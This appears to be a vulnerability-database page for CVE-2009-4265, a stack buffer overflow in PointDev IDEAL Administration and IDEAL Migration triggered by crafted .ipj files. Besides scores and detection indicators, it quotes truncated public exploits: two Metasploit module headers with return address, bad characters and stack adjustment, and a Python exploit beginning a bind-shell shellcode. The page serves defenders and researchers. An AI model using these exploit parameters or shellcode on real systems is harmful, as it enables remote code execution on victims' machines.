CVE-2009-4265
published 2009-12-10CVE-2009-4265: Stack-based buffer overflow in Ideal Administration 2009 9.7.1, and possibly other versions, allows remote attackers to execute arbitrary code via a long…
PriorityP353critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
31.39%
98.1th percentile
Stack-based buffer overflow in Ideal Administration 2009 9.7.1, and possibly other versions, allows remote attackers to execute arbitrary code via a long Computer value in an .ipj project file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pointdev | ideal_administration_2009 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
0D 0A 5B 45 6E 64 5D 0D 0A
- →Malicious .ipj file contains the pattern '[Group,Export,Yes]' header followed by an oversized 'Computer=' value (2420+ bytes) triggering a stack buffer overflow. ↗
- →Bad characters for payload encoding in this exploit are: 0x00, 0x0a, 0x1a, 0x22, 0x3c, 0x3e — useful for tuning IDS/YARA rules to match encoded shellcode patterns in .ipj files. ↗
- →EXITFUNC is set to 'seh' in all exploit variants, indicating SEH-based shellcode execution; monitor for SEH chain overwrites in processes loading ListWmi.dll or ULMigration_us.dll. ↗
- →Stack adjustment of -3500 bytes is used in the exploit payload; anomalous large negative stack adjustments in the context of .ipj file parsing may indicate exploitation. ↗
- ·IDEAL Administration 10.5 is compiled with /SafeSEH, which mitigates the SEH-based exploitation path used by these exploits; detection rules targeting SEH overwrites may not fire on 10.5. ↗
- ·All versions of IDEAL Administration (v9.7 through v10.5) and IDEAL Migration (4.5 and 4.51) are considered vulnerable; version-based filtering alone is insufficient for detection. ↗
- ·The exploit is file-format/local in nature — it requires the victim to open a crafted .ipj project file via 'Migrate -> Open Migration Project'; there is no network-based attack vector. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PointDev IDEAL Migration - Buffer Overflow (Metasploit)
exploitdb·2010-09-25
CVE-2009-4265 PointDev IDEAL Migration - Buffer Overflow (Metasploit)
PointDev IDEAL Migration - Buffer Overflow (Metasploit)
---
##
# $Id: ideal_migration_ipj.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'PointDev IDEAL Migration Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in versions v9.7
through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of
IDEAL Migration. All versions are suspected to be vulnerable.
By creating a specially crafted ipj file, an an attacker may be able
to execute arbitrary code.
NOTE: IDEAL Administr
Exploit-DB
PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow (Metasploit)
exploitdb·2009-12-06
CVE-2009-4265 PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow (Metasploit)
PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow (Metasploit)
---
require 'msf/core'
class Metasploit3 'IDEAL Administration 2009 Buffer Overflow - Universal',
'Description' => %q{
This module exploits a stack overflow in IDEAL Administration v9.7.
By creating a specially crafted ipj file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'dookie, original by Dr_IDE' ],
'Version' => '$Revision: 7724 $',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/10319' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x3c\x22\x3e\x1a\x0a",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Universal', { 'Ret' => 0x10010F2E } ], # ListWmi.dll
Exploit-DB
PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow
exploitdb·2009-12-05
CVE-2009-4265 PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow
PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow
---
#!/usr/bin/env python
#################################################################
#
# IDEAL Administration 2009 v9.7 Local Buffer Overflow Exploit
# Found By: Dr_IDE
# Usage: Migrate -> Open Migration Project -> Bind Shell
# Download: www.pointdev.com
# Tested On: Windows XPSP3
#
#################################################################
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
sc = (
"\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x42\x4a\x4a\x4b\x5
Metasploit
PointDev IDEAL Migration Buffer Overflow
metasploit
PointDev IDEAL Migration Buffer Overflow
PointDev IDEAL Migration Buffer Overflow
This module exploits a stack buffer overflow in versions v9.7 through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of IDEAL Migration. All versions are suspected to be vulnerable. By creating a specially crafted ipj file, an attacker may be able to execute arbitrary code. NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH
No writeups or analysis indexed.
2009-12-10
Published